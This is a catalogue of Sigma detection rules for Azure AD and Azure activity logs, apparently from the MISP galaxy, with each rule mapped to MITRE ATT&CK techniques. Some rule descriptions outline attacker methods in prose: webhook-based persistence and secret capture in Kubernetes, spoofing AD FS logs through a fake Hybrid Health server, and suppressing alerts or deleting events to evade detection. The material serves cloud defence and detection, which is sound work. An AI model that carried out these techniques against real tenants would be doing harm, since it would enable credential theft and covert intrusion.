Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, SharePoint, or Azure AD.

The tag is: misp-galaxy:sigma-rules="App Granted Microsoft Permissions"

App Granted Microsoft Permissions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11325. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml

CA Policy Removed by Non Approved Actor

Monitor and alert on conditional access changes where a non-approved actor removed a CA policy.

The tag is: misp-galaxy:sigma-rules="CA Policy Removed by Non Approved Actor"

CA Policy Removed by Non Approved Actor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11326. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml

App Granted Privileged Delegated Or App Permissions

Detects when an administrator grants either application permissions (app roles) or highly privileged delegated permissions.

The tag is: misp-galaxy:sigma-rules="App Granted Privileged Delegated Or App Permissions"

App Granted Privileged Delegated Or App Permissions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11327. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml

New CA Policy by Non-approved Actor

Monitor and alert on conditional access changes.

The tag is: misp-galaxy:sigma-rules="New CA Policy by Non-approved Actor"

New CA Policy by Non-approved Actor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11328. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml

CA Policy Updated by Non Approved Actor

Monitor and alert on conditional access changes. Is the "Initiated by" actor approved to make changes? Review the modified properties and compare the "old" and "new" values.

The tag is: misp-galaxy:sigma-rules="CA Policy Updated by Non Approved Actor"

CA Policy Updated by Non Approved Actor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11329. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml

Changes To PIM Settings

Detects when changes are made to PIM roles.

The tag is: misp-galaxy:sigma-rules="Changes To PIM Settings"

Changes To PIM Settings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11330. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_change_settings.yml

Users Added to Global or Device Admin Roles

Monitor and alert for users added to device admin roles.

The tag is: misp-galaxy:sigma-rules="Users Added to Global or Device Admin Roles"

Users Added to Global or Device Admin Roles has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11331. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml

User State Changed From Guest To Member

Detects the change of user type from "Guest" to "Member" for potential elevation of privilege.

The tag is: misp-galaxy:sigma-rules="User State Changed From Guest To Member"

User State Changed From Guest To Member has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11332. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_guest_to_member.yml

PIM Alert Setting Changes To Disabled

Detects when PIM alerts are set to disabled.

The tag is: misp-galaxy:sigma-rules="PIM Alert Setting Changes To Disabled"

PIM Alert Setting Changes To Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11333. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml

Application URI Configuration Changes

Detects when a configuration change is made to an application's URI. URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.

The tag is: misp-galaxy:sigma-rules="Application URI Configuration Changes"

Application URI Configuration Changes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11334. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml

Application AppID Uri Configuration Changes

Detects when a configuration change is made to an application's AppID URI.

The tag is: misp-galaxy:sigma-rules="Application AppID Uri Configuration Changes"

Application AppID Uri Configuration Changes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11335. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml

Guest Users Invited To Tenant By Non Approved Inviters

Detects guest users being invited to the tenant by non-approved inviters.

The tag is: misp-galaxy:sigma-rules="Guest Users Invited To Tenant By Non Approved Inviters"

Guest Users Invited To Tenant By Non Approved Inviters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11336. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml

PIM Approvals And Deny Elevation

Detects when a PIM elevation is approved or denied. Approvals or denials outside of normal operations should be investigated.

The tag is: misp-galaxy:sigma-rules="PIM Approvals And Deny Elevation"

PIM Approvals And Deny Elevation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11337. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml

Delegated Permissions Granted For All Users

Detects when highly privileged delegated permissions are granted on behalf of all users.

The tag is: misp-galaxy:sigma-rules="Delegated Permissions Granted For All Users"

Delegated Permissions Granted For All Users has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11338. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml

Changes to Device Registration Policy

Monitor and alert for changes to the device registration policy.

The tag is: misp-galaxy:sigma-rules="Changes to Device Registration Policy"

Changes to Device Registration Policy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484" with estimative-language:likelihood-probability="almost-certain"

Table 11339. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml

Privileged Account Creation

Detects when a new admin is created.

The tag is: misp-galaxy:sigma-rules="Privileged Account Creation"

Privileged Account Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11340. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml

User Removed From Group With CA Policy Modification Access

Monitor and alert on membership removals from groups that have CA policy modification access.

The tag is: misp-galaxy:sigma-rules="User Removed From Group With CA Policy Modification Access"

User Removed From Group With CA Policy Modification Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11341. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml

End User Consent Blocked

Detects when end user consent is blocked due to risk-based consent.

The tag is: misp-galaxy:sigma-rules="End User Consent Blocked"

End User Consent Blocked has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11342. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml

Azure Key Vault Modified or Deleted

Identifies when a key vault is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Key Vault Modified or Deleted"

Azure Key Vault Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11344. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml

Azure Firewall Rule Collection Modified or Deleted

Identifies when Rule Collections (Application, NAT, and Network) are being modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Firewall Rule Collection Modified or Deleted"

Azure Firewall Rule Collection Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11345. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml

Azure Kubernetes Admission Controller

Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks, for example the MutatingAdmissionWebhook, to obtain persistence in the cluster: attackers can intercept and modify pod creation operations in the cluster and add their malicious container to every created pod. An adversary can also use the ValidatingAdmissionWebhook to obtain access credentials, by using the webhook to intercept requests to the API server and record secrets and other sensitive information.

The tag is: misp-galaxy:sigma-rules="Azure Kubernetes Admission Controller"

Azure Kubernetes Admission Controller has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"

Table 11346. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml

Rare Subscription-level Operations In Azure

Identifies IPs from which users grant access to other users on Azure resources and alerts when a previously unseen source IP address is used.

The tag is: misp-galaxy:sigma-rules="Rare Subscription-level Operations In Azure"

Rare Subscription-level Operations In Azure has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 11347. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_rare_operations.yml

Azure Application Gateway Modified or Deleted

Identifies when an application gateway is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Application Gateway Modified or Deleted"

Table 11348. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml

Azure Application Security Group Modified or Deleted

Identifies when an application security group is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Application Security Group Modified or Deleted"

Table 11349. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml

Azure Device or Configuration Modified or Deleted

Identifies when a device or device configuration in Azure is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Device or Configuration Modified or Deleted"

Azure Device or Configuration Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11351. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml

Azure Application Deleted

Identifies when an application is deleted in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Application Deleted"

Azure Application Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 11352. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_deleted.yml

Azure Subscription Permission Elevation Via ActivityLogs

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn’t planned. This setting could allow an attacker access to Azure subscriptions in your environment.

The tag is: misp-galaxy:sigma-rules="Azure Subscription Permission Elevation Via ActivityLogs"

Azure Subscription Permission Elevation Via ActivityLogs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11353. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml

Azure Firewall Rule Configuration Modified or Deleted

Identifies when a firewall rule configuration is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Firewall Rule Configuration Modified or Deleted"

Table 11354. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml

Azure Network Security Configuration Modified or Deleted

Identifies when a network security configuration is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Network Security Configuration Modified or Deleted"

Table 11356. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml

Number Of Resource Creation Or Deployment Activities

Identifies the number of VM creation or deployment activities that occur in Azure, using the azureactivity log.

The tag is: misp-galaxy:sigma-rules="Number Of Resource Creation Or Deployment Activities"

Number Of Resource Creation Or Deployment Activities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11357. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml

Azure Virtual Network Device Modified or Deleted

Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router.

The tag is: misp-galaxy:sigma-rules="Azure Virtual Network Device Modified or Deleted"

Table 11358. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml

Azure Network Firewall Policy Modified or Deleted

Identifies when a firewall policy is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Network Firewall Policy Modified or Deleted"

Azure Network Firewall Policy Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007" with estimative-language:likelihood-probability="almost-certain"

Table 11359. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml

Azure New CloudShell Created

Identifies when a new Cloud Shell is created inside the Azure portal.

The tag is: misp-galaxy:sigma-rules="Azure New CloudShell Created"

Azure New CloudShell Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11361. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml

Azure Application Credential Modified

Identifies when an application credential is modified.

The tag is: misp-galaxy:sigma-rules="Azure Application Credential Modified"

Table 11362. Table References

Links

https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_app_credential_modification.yml

Azure Active Directory Hybrid Health AD FS Service Delete

This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid Health AD FS service instance in a tenant. A threat actor can create a new AD Health AD FS service and a fake server to spoof AD FS signing logs. The Health AD FS service can then be deleted, once it is no longer needed, via HTTP requests to Azure.

The tag is: misp-galaxy:sigma-rules="Azure Active Directory Hybrid Health AD FS Service Delete"

Azure Active Directory Hybrid Health AD FS Service Delete has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Delete Cloud Instance - T1578.003" with estimative-language:likelihood-probability="almost-certain"

Table 11363. Table References

Links

https://o365blog.com/post/hybridhealthagent/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml

Azure Suppression Rule Created

Identifies when a suppression rule is created in Azure. Adversaries could attempt this to evade detection.

The tag is: misp-galaxy:sigma-rules="Azure Suppression Rule Created"

Table 11364. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml

Azure Active Directory Hybrid Health AD FS New Server

This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.

The tag is: misp-galaxy:sigma-rules="Azure Active Directory Hybrid Health AD FS New Server"

Azure Active Directory Hybrid Health AD FS New Server has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Infrastructure - T1578" with estimative-language:likelihood-probability="almost-certain"

Table 11365. Table References

Links

https://o365blog.com/post/hybridhealthagent/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml

Azure Owner Removed From Application or Service Principal

Identifies when an owner was removed from an application or service principal in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Owner Removed From Application or Service Principal"

Table 11366. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml

Granting Of Permissions To An Account

Identifies IPs from which users grant access to other users on Azure resources and alerts when a previously unseen source IP address is used.

The tag is: misp-galaxy:sigma-rules="Granting Of Permissions To An Account"

Granting Of Permissions To An Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11367. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml

Azure Keyvault Key Modified or Deleted

Identifies when a Keyvault Key is modified or deleted in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Keyvault Key Modified or Deleted"

Azure Keyvault Key Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11370. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml

Azure VPN Connection Modified or Deleted

Identifies when a VPN connection is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure VPN Connection Modified or Deleted"

Table 11371. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml

Azure Kubernetes Events Deleted

Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.

The tag is: misp-galaxy:sigma-rules="Azure Kubernetes Events Deleted"

Azure Kubernetes Events Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11373. Table References

Links

https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml

User Added to an Administrator’s Azure AD Role

User Added to an Administrator’s Azure AD Role

The tag is: misp-galaxy:sigma-rules="User Added to an Administrator’s Azure AD Role"

User Added to an Administrator’s Azure AD Role has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11374. Table References

Links

https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml

Azure Kubernetes CronJob

Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. A Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a Kubernetes CronJob to schedule the execution of malicious code that would run as a container in the cluster.

The tag is: misp-galaxy:sigma-rules="Azure Kubernetes CronJob"

Azure Kubernetes CronJob has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11375. Table References

Links

https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/

https://kubernetes.io/docs/concepts/workloads/controllers/job/

https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml

Azure Firewall Modified or Deleted

Identifies when a firewall is created, modified, or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Firewall Modified or Deleted"

Azure Firewall Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11377. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml

Azure DNS Zone Modified or Deleted

Identifies when a DNS zone is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure DNS Zone Modified or Deleted"

Azure DNS Zone Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11378. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml

Azure Virtual Network Modified or Deleted

Identifies when a Virtual Network is modified or deleted in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Virtual Network Modified or Deleted"

Table 11379. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml

Azure Device No Longer Managed or Compliant

Identifies when a device in Azure is no longer managed or compliant.

The tag is: misp-galaxy:sigma-rules="Azure Device No Longer Managed or Compliant"

Table 11380. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml

Disabled MFA to Bypass Authentication Mechanisms

Detection for when multi-factor authentication has been disabled, which might indicate malicious activity to bypass authentication mechanisms.

The tag is: misp-galaxy:sigma-rules="Disabled MFA to Bypass Authentication Mechanisms"

Disabled MFA to Bypass Authentication Mechanisms has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11381. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_mfa_disabled.yml

Azure Point-to-site VPN Modified or Deleted

Identifies when a Point-to-site VPN is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Point-to-site VPN Modified or Deleted"

Table 11382. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml

Azure Keyvault Secrets Modified or Deleted

Identifies when secrets are modified or deleted in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Keyvault Secrets Modified or Deleted"

Azure Keyvault Secrets Modified or Deleted has relationships with:

